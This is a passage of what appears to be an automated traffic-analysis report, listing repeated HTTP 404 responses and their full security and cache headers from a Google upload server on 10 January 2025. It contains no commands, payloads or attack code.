ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgThbLn6N7E-FLyM8gEELYBtm-GG7SkfBHrC5-8ec9mjV93qn4HJGpeoqCsBZRZiAhWNbh_Ypk4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:34 GMTContent-Security-Policy: script-src 'nonce-yvyr2wOw-mtbn_1v8vZZew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTjowg5kWfr0Wfs6wLkunZEMZxrpbgXbyeJZpSf_Rfmv6WjT3hntnc1GKVmeTEw14vSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:36 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-_Vczn3OFxjJ22lwq6h98UA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSBrkuQsPgmMEskLxGC8hVJpfkBFz_TA9Kd-xz1ltYF9nPDo0zqAibtQJgWLo7WIU7TContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:38 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-IglOiNTc-nCREr1D1YXe2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRIsS3_VR1zqWgNr05Qpyb2NV_oR098XDlKKkRQR6x8doYWwv4L_9IT-MFIRtJewoQlolLcUygContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:41 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ado2d8D14lTUJJHIjNGIug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQddutKmDAyiLh6KjyyQXHoFCujtkvNkLpzhF62EnYvRaNnqF9LMzc9hGvxmnzlqDRzContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:43 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-sMlgXdLfw758_kVJkUeB8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6lvTj79Wqf7IQPqXc9LIhDplZxpFurjOCd4i9NkftsKE5fNccmDa6P7uWXRY6wEZGjContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:45 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ofVOmCbap95lBIkTCA-a0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7PpJygco78OAPaK3hFG88oonTt-210VLZpt1h3UkWp4KJjvNTfvmGNA8z53oNzaRXvJhY0Hm0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:48 GMTContent-Security-Policy: script-src 'nonce-zorbvJy5_Y_vFdXBlwFtvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQdH2qI21pfkijE6AqVGEfGxcmAmFSxdvKQQXu42vBc6g9j9DntnMdn8Mrp-HHfcEZ-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:50 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-Tknkkwpyd_Y7h1Ylp6MlTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQkBoNgBV_8BSIdlgQQwj28T0IQz8kJpZcNXuJxeZwDfnGxVwOHA2p494g7uJsAgCeC4ATGDgYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:52 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-v-MOaZowg8EwsNz76hMwhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRGOSH3aadEM-ryRfiG3x_EOBJRVVXZnjzEOg_I9Kvh6FA3IrU8P40OtZH0J7u6r7LBContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:54 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-5Ak-aDRE4q5gSHY7kuvoGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS56XdYJC_Cscee8oTNI8OTyX5KIniKl1XzvA8D2ya4JmpD9rbifUt4mw3XTVh1BJCeqtBX6rkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:57 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-amwoCEfAgwyciBlWv_V4qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR4aHqqIKt2xM_Ete05aufdESMF_kJyeDUlbD8RyOKwy8pi0pJdFaz04teLSHCFcqowContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:59 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-FCnZDBoxrNP2ohNT_-FG1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5JaV-GwXVGnir7kPp2M9m76bYcVNzOfII5YMZo3e0aWgw3Jcm2TfaJOcjHF6HP0pXQCZiaZcEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:03:01 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-6uQy5xcDImAJFpKa5sUbVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQPTa8zBT2xe9uHEQjLnAb87GeTXZm22HVrFb_F8YzM940G9K7iLHQgeJfRBwUIcfEoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:03:03 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-eqodYzHgPbVl8OExEnCV-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7kqX-fd5fzeS7KSBlWggjeUUW-7UyxGmjDjS--WYVPiOnzfR4jF8D-SdQLRsk--OQNContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:03:06 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-kYeicar-jivk2dxedxomeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: 